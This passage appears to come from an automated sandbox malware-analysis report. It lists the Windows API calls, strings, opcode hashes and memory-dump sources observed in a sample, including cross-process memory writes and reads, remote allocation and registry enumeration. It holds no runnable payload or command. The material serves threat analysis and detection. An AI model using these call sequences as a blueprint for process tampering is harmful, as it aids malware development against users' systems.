                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00906461
                                    • LoadLibraryW.KERNEL32(?), ref: 00906468
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0090647D
                                    • DestroyWindow.USER32(?), ref: 00906485
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 008E6DBC
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E6DEF
                                    • GetStdHandle.KERNEL32(0000000C), ref: 008E6E01
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E6E3B
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 008E6E89
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E6EBB
                                    • GetStdHandle.KERNEL32(000000F6), ref: 008E6ECC
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E6F06
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EAC54
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EACA8
                                    • __swprintf.LIBCMT ref: 008EACC1
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EACFF
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 008E1B19
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 3964851224-769500911
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEC07
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEC37
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FED6A
                                    • CloseHandle.KERNEL32(?), ref: 008FEDEB
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009000FD
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0090013C
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00900183
                                    • RegCloseKey.ADVAPI32(?,?), ref: 009001AF
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009001BC
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                    • String ID:
                                    • API String ID: 3440857362-0
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FD927
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008FD9AA
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 008FD9C6
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008FDA07
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDA21
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE61F
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE648
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE687
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE6AC
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE6B4
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                    • String ID:
                                    • API String ID: 1389676194-0
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00882357
                                    • ScreenToClient.USER32(009457B0,?), ref: 00882374
                                    • GetAsyncKeyState.USER32(00000001), ref: 00882399
                                    • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D63E7
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 008D6433
                                    • TranslateMessage.USER32(?), ref: 008D645C
                                    • DispatchMessageW.USER32(?), ref: 008D6466
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D6475
                                    Similarity
                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                    • String ID:
                                    • API String ID: 2108273632-0
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 008D8A30
                                    • PostMessageW.USER32(?,00000201,00000001), ref: 008D8ADA
                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8AE2
                                    • PostMessageW.USER32(?,00000202,00000000), ref: 008D8AF0
                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8AF8
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 008DB204
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB221
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB259
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008DB27F
                                    • _wcsstr.LIBCMT ref: 008DB289
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090B192
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B1B7
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B1CF
                                    • GetSystemMetrics.USER32(00000004), ref: 0090B1F8
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008F0E90,00000000), ref: 0090B216
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9320
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9352
                                    • __itow.LIBCMT ref: 008D936A
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9392
                                    • __itow.LIBCMT ref: 008D93A3
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 008F5A6E
                                    • GetForegroundWindow.USER32 ref: 008F5A85
                                    • GetDC.USER32(00000000), ref: 008F5AC1
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 008F5ACD
                                    • ReleaseDC.USER32(00000000,00000003), ref: 008F5B08
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                    • SelectObject.GDI32(?,00000000), ref: 0088135C
                                    • BeginPath.GDI32(?), ref: 00881373
                                    • SelectObject.GDI32(?,00000000), ref: 0088139C
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    APIs
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 008E4ABA
                                    • __beginthreadex.LIBCMT ref: 008E4AD8
                                    • MessageBoxW.USER32(?,?,?,?), ref: 008E4AED
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008E4B03
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008E4B0A
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D821E
                                    • GetLastError.KERNEL32(?,008D7CE2,?,?,?), ref: 008D8228
                                    • GetProcessHeap.KERNEL32(00000008,?,?,008D7CE2,?,?,?), ref: 008D8237
                                    • RtlAllocateHeap.NTDLL(00000000,?,008D7CE2), ref: 008D823E
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D8255
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    APIs
                                    • CLSIDFromProgID.COMBASE ref: 008D7127
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D7142
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D7044,80070057,?,?), ref: 008D7150
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008D7160
                                    • CLSIDFromString.COMBASE(?,?), ref: 008D716C
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5260
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E526E
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5276
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5280
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: aafdb54d08c660129331b1d6c4c64d39636f1e369eb515ddd26712348dbf82f8
                                    • Instruction ID: 3d0264591a90a7cdd6b0506417fe72d831f6fb79291145f4376fc534a3cd52fd
                                    • Opcode Fuzzy Hash: aafdb54d08c660129331b1d6c4c64d39636f1e369eb515ddd26712348dbf82f8
                                    • Instruction Fuzzy Hash: 30012931D19A1DDBCF10EFE5E8599EDBB78FB0E715F400156EA41F2240CB3096549BA1
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8121
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D812B
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D813A
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8141
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8157
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                    • Instruction ID: d8d2ea7141167aafa8ad1458464aee4bb405756d824bc8bd18e753dc2e458cc2
                                    • Opcode Fuzzy Hash: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                    • Instruction Fuzzy Hash: F6F06271214314EFEB220FA5EC99F673BBCFF49B54F000126F945C6250CB619E45EA60
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 008DC1F7
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC20E
                                    • MessageBeep.USER32(00000000), ref: 008DC226
                                    • KillTimer.USER32(?,0000040A), ref: 008DC242
                                    • EndDialog.USER32(?,00000001), ref: 008DC25C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 8f99dcd0552c4f96abfe4704e86512c09313034a0e293c3349bea786d190a707
                                    • Instruction ID: a765f1ac59a361cd4bdf2603e757f6493f6584cbd80ac4bd5b308b708fcddffc
                                    • Opcode Fuzzy Hash: 8f99dcd0552c4f96abfe4704e86512c09313034a0e293c3349bea786d190a707
                                    • Instruction Fuzzy Hash: 6001A7304587099BEB315B54DD5EB967778FB00B06F04076AE542D15E0D7E16944DB50
                                    APIs
                                    • EndPath.GDI32(?), ref: 008813BF
                                    • StrokeAndFillPath.GDI32(?,?,008BB888,00000000,?), ref: 008813DB
                                    • SelectObject.GDI32(?,00000000), ref: 008813EE
                                    • DeleteObject.GDI32 ref: 00881401
                                    • StrokePath.GDI32(?), ref: 0088141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 1e675b3241b044e03eafeb3d119a9815d547ef63858ae7053bb501a3c6d3c042
                                    • Instruction ID: 61ffb1ea42a4d7cb5f47f0d753f791a49df9f1273d8e7e0932c3680d76ac38c6
                                    • Opcode Fuzzy Hash: 1e675b3241b044e03eafeb3d119a9815d547ef63858ae7053bb501a3c6d3c042
                                    • Instruction Fuzzy Hash: 91F0CD34028608DFDB215F56EC5CB583BA9F702326F098224E42989AF2CB354596EF54
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D899D
                                    • CloseHandle.KERNEL32(?), ref: 008D89B2
                                    • CloseHandle.KERNEL32(?), ref: 008D89BA
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008D89C3
                                    • HeapFree.KERNEL32(00000000), ref: 008D89CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 3751786701-0
                                    • Opcode ID: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                                    • Instruction ID: 8f9bbf84d9c719a86ad8372bf59e268435a320e341ca4ea3f4a1b51728f88cc4
                                    • Opcode Fuzzy Hash: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                                    • Instruction Fuzzy Hash: 3AE0C236018601FFDA115FE1EC1C90ABB79FB89B62B108230F219C1870CB329560EB90
                                    APIs
                                      • Part of subcall function 008A0DB6: std::exception::exception.LIBCMT ref: 008A0DEC
                                      • Part of subcall function 008A0DB6: __CxxThrowException@8.LIBCMT ref: 008A0E01
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00887A51: _memmove.LIBCMT ref: 00887AAB
                                    • __swprintf.LIBCMT ref: 00892ECD
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892D66
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: b7cde44654f9658757ecbd4cdd14be87b3f9773bfe1d9af08c1a4564780127f4
                                    • Instruction ID: aac83b38451b3d2b410e622df3ddf9dca7e910568e922718b3ea5d7032ce5881
                                    • Opcode Fuzzy Hash: b7cde44654f9658757ecbd4cdd14be87b3f9773bfe1d9af08c1a4564780127f4
                                    • Instruction Fuzzy Hash: F9913671108215ABDB14FF28C885D6EB7B4FF85720F14492DF496DB2A2EA30ED44CB52
                                    APIs
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                    • CoInitialize.OLE32(00000000), ref: 008EB9BB
                                    • CoCreateInstance.COMBASE(00912D6C,00000000,00000001,00912BDC,?), ref: 008EB9D4
                                    • CoUninitialize.COMBASE ref: 008EB9F1
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: b7f97ca1072cbdd7c4b341925ac19f667c68b411a0f84cb9c4007587b96cbf0d
                                    • Instruction ID: 8d306c58eb34defc2df35f5b6693fa29aada6b168763742fc0e8365e26591bda
                                    • Opcode Fuzzy Hash: b7f97ca1072cbdd7c4b341925ac19f667c68b411a0f84cb9c4007587b96cbf0d
                                    • Instruction Fuzzy Hash: 4FA135756043469FCB00EF19C884D6ABBE5FF8A324F148958F8999B361CB31ED45CB92
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 008A50AD
                                      • Part of subcall function 008B00F0: __87except.LIBCMT ref: 008B012B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 6e975829ba9d35fa723074f7246c00574f6007b87c0ae85627d20fe554992c06
                                    • Instruction ID: 06a7d900585f3c661f525cc7157129d20fa7157dc4e536027cd40bbdd9b8ce64
                                    • Opcode Fuzzy Hash: 6e975829ba9d35fa723074f7246c00574f6007b87c0ae85627d20fe554992c06
                                    • Instruction Fuzzy Hash: B0515D21A1CE0696E715B718C8053FF7B94FB42700F208959E4D5C6799EE348DC8EE82
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: b487f9fbac8e9e6fb302b5110b924287e043f84e1785fe12f6934d9117e2226f
                                    • Instruction ID: e576b7615c36705ad39ece79ff6961d5b4e676d986c277731278bf6e6f1a9f6a
                                    • Opcode Fuzzy Hash: b487f9fbac8e9e6fb302b5110b924287e043f84e1785fe12f6934d9117e2226f
                                    • Instruction Fuzzy Hash: D151B071900309DFDB24DFA9C941BAAB7E5FF04314F24466EE44ACB291E770AA50DF40
                                    APIs
                                      • Part of subcall function 008E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008D9296,?,?,00000034,00000800,?,00000034), ref: 008E14E6
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008D983F
                                      • Part of subcall function 008E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008E14B1
                                      • Part of subcall function 008E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008E1409
                                      • Part of subcall function 008E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008D925A,00000034,?,?,00001004,00000000,00000000), ref: 008E1419
                                      • Part of subcall function 008E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008D925A,00000034,?,?,00001004,00000000,00000000), ref: 008E142F
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008D98AC
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008D98F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
